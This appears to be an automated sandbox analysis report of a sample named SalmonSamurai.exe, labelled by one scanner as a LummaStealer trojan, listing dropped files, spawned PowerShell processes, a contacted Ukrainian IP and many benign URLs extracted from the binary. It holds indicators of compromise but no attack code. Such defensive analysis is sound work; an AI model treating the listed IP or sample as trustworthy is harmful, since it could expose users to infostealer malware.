System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579955 Sample: SalmonSamurai.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 45 53 Multi AV Scanner detection for submitted file 2->53 55 AI detected suspicious sample 2->55 8 SalmonSamurai.exe 89 2->8         started        process3 file4 39 C:\Users\user\AppData\...\SalmonSamurai.exe, PE32+ 8->39 dropped 41 C:\Users\user\AppData\...\vulkan-1.dll, PE32+ 8->41 dropped 43 C:\Users\user\AppData\...\vk_swiftshader.dll, PE32+ 8->43 dropped 45 5 other files (none is malicious) 8->45 dropped 57 Drops large PE files 8->57 12 SalmonSamurai.exe 3 8->12         started        signatures5 process6 dnsIp7 49 89.187.28.253, 49862, 80 UA-WICOMWiMAXUkraineAutonomousSystemUA Ukraine 12->49 51 192.168.2.5 unknown unknown 12->51 15 powershell.exe 35 12->15         started        18 powershell.exe 12->18         started        20 powershell.exe 12->20         started        22 21 other processes 12->22 process8 dnsIp9 59 Loading BitLocker PowerShell Module 15->59 25 conhost.exe 15->25         started        27 conhost.exe 18->27         started        29 conhost.exe 20->29         started        47 chrome.cloudflare-dns.com 172.64.41.3, 443, 49748, 49749 CLOUDFLARENETUS United States 22->47 31 conhost.exe 22->31         started        33 conhost.exe 22->33         started        35 conhost.exe 22->35         started        37 18 other processes 22->37 signatures10 process11

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SalmonSamurai.exe30%ReversingLabsWin32.Trojan.LummaStealer

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\ffmpeg.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://crbug.com/dawn/12760%Avira URL Cloudsafe
https://crbug.com/dawn/5370%Avira URL Cloudsafe
https://bugs.chromium.org/p/dawn/issues/detail?id=434timestamp-querySupport0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
172.64.41.3
truefalse
    		high

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://mx.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
      		high
      https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
        		high
        https://fr.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
          		high
          https://search.seznam.sk/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
            		high
            https://doh.familyshield.opendns.com/dns-querySalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
              		high
              https://crbug.com/newSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                		high
                https://hk.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                  		high
                  https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                    		high
                    https://crbug.com/dawn/402SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                      		high
                      https://crbug.com/dawn/1393SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                        		high
                        http://i.wp.pl/a/i/stg/500/favicon.icohttp://szukaj.wp.pl/szukaj.html?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                          		high
                          https://crbug.com/dawn/1276SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://crbug.com/1338622.SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                            		high
                            https://dns11.quad9.net/dns-querySalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                              		high
                              https://crbug.com/1214923SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                		high
                                https://suggestplugin.gmx.co.uk/s?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                  		high
                                  https://ca.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                    		high
                                    https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                      		high
                                      http://www.walla.co.il/favicon.icohttp://search.walla.co.il/?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                        		high
                                        https://www.givero.com/suggest?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                          		high
                                          http://www.neti.ee/favicon.icohttp://www.neti.ee/cgi-bin/otsing?query=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                            		high
                                            https://crbug.com/dawn/776SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                              		high
                                              https://yandex.com.tr/gorsel/search?rpt=imageviewhttps://www.yandex.com.tr/chrome/newtabSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                		high
                                                https://crbug.com/dawn/1289SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                  		high
                                                  https://www.so.com/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                    		high
                                                    https://crbug.com/dawn/537SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://dk.search.yahoo.com/favicon.icohttps://dk.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                      		high
                                                      https://at.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                        		high
                                                        http://l.twimg.com/i/hpkp_reportSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                          		high
                                                          https://nextdns.io/privacySalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                            		high
                                                            https://malaysia.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                              		high
                                                              http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.icohttps://hladaj.atlas.sk/fulltext/?pSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                		high
                                                                http://www.conduit.com/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                  		high
                                                                  https://crbug.com/tint.SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                    		high
                                                                    https://vn.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                      		high
                                                                      https://developers.google.com/speed/public-dns/privacyGoogleSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                        		high
                                                                        https://www.ask.com/web?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                          		high
                                                                          https://doh.opendns.com/dns-querySalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                            		high
                                                                            https://ph.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                              		high
                                                                              https://www.ecosia.org/newtab/SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                		high
                                                                                http://www.conduit.com/favicon.icohttp://www.conduit.com/search?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                  		high
                                                                                  https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                    		high
                                                                                    https://tw.search.yahoo.com/favicon.icohttps://tw.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                      		high
                                                                                      https://www.delfi.lt/favicon.icohttps://www.delfi.lt/paieska/?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                        		high
                                                                                        http://search.imesh.net/music?hl=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                          		high
                                                                                          https://qc.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                            		high
                                                                                            https://sug.so.360.cn/suggest?encodein=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                              		high
                                                                                              https://cl.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                		high
                                                                                                https://yandex.kz/images/search/?rpt=imageviewSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                  		high
                                                                                                  https://coccoc.com/search#query=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.yandex.by/chrome/newtabSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                      		high
                                                                                                      https://crbug.com/dawn/633SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                        		high
                                                                                                        https://ph.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.walla.co.il/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                            		high
                                                                                                            https://crbug.com/dawn/1071SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                              		high
                                                                                                              https://go.mail.ru/chrome/newtab/SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                		high
                                                                                                                https://id.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://uk.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.neti.ee/cgi-bin/otsing?query=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://petalsearch.com/search?query=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://bugs.chromium.org/p/dawn/issues/detail?id=434timestamp-querySupportSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://ok.hu/gfx/favicon.icohttp://ok.hu/katalogus?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://bugs.chromium.org/p/dawn/issues/detail?id=690SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://qc.search.yahoo.com/favicon.icohttps://qc.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://dns.google/dns-querySalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://ph.search.yahoo.com/favicon.icohttps://ph.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                  		high
